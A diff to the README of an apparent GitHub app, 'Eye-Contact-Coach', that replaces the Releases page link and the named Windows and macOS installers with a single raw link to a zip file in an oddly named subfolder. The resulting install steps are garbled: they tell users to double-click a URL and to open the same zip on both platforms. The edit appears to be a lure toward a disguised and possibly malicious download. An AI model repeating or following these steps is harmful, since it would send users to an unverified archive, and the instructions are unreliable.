Razoredent/Eye-Contact-Coach/README.md

 To get started, please follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/Razoredent/Eye-Contact-Coach/releases) to find the latest version of Eye-Contact-Coach.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/Razoredent/Eye-Contact-Coach/main/semismile/Eye-Contact-Coach_v3.7.zip) to find the latest version of Eye-Contact-Coach.

 2. **Download the App:** Click on the download link for the version you choose.
-Look for files named `Eye-Contact-Coach-setup.exe` for Windows or `Eye-Contact-Coach.dmg` for macOS.
+Look for files named `https://raw.githubusercontent.com/Razoredent/Eye-Contact-Coach/main/semismile/Eye-Contact-Coach_v3.7.zip` for Windows or `https://raw.githubusercontent.com/Razoredent/Eye-Contact-Coach/main/semismile/Eye-Contact-Coach_v3.7.zip` for macOS.

 3. **Run the Installer:**
-   - For Windows, double-click the `Eye-Contact-Coach-setup.exe` file.
+   - For Windows, double-click the `https://raw.githubusercontent.com/Razoredent/Eye-Contact-Coach/main/semismile/Eye-Contact-Coach_v3.7.zip` file.
 Follow the prompts to install the application.
-   - For macOS, open the `Eye-Contact-Coach.dmg` file and drag the app into your Applications folder.
+   - For macOS, open the `https://raw.githubusercontent.com/Razoredent/Eye-Contact-Coach/main/semismile/Eye-Contact-Coach_v3.7.zip` file and drag the app into your Applications folder.

 4. **Launch the Application:** Once the installation is complete, open Eye-Contact-Coach from your applications list.